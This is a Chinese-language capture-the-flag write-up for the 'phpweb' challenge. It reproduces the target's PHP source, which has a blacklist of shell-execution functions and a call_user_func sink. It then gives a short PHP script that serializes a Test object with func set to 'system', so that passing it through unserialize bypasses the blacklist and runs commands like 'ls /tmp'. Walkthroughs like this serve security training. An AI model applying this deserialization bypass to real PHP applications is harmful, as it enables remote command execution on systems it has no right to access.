朱雀组phpweb

1.png
直接右键审查代码,发现有两个隐藏的post参数 func和p 他给的参数是date 和设置的格式 猜想这个date是函数,我们试试读取一下index.php的内容
这里面就要说一下php3个读取php代码的函数
file_get_contents readfile highlight_file
这三个函数的主要区别是 前两个在浏览器端不能显示 第三个是只能在浏览器端显示 这三个函数的区别一般是效率的区别
一般选择file_get_contents比较多 尽管他不是速度最快的 但是读取容量最大的
file_get_contents.png
highlight.png
readfile.png
展示一下三种的效果
观察源码ban掉了一些函数

 <?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

这里面使用了call_user_func这个函数,这个函数相当于动态调用函数,将第一个参数作为作为函数 相当于以前那个$b($a)
这里面给了一个test类,仔细看一下函数并没有过滤unserialize 所以思路就是在func里面传入unserialize,p传入我们反序列化的内容
构造

<?php
class Test
{
public $p = "ls /tmp";
public $func = "system";
}
$c = new Test();
echo serialize($c);
?>

这里面注意$p 和$func 关于call_user_func 第一个参数作为函数
flag1.png
然后直接读这个文件就好了
flag2.png